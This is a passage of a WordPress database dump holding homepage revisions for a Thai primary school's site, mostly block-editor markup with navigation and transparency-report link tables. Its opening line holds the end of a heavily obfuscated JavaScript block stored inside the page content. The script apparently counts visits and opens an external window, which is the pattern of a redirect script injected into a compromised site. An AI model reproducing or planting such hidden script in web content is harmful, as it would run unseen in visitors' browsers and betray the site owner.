_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-03 21:49:38','2024-08-03 14:49:38','',14,'http://pakhaeng.ssk.in.th/?p=514',0,'revision','',0),
(516,1,'2024-08-03 21:52:03','2024-08-03 14:52:03','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 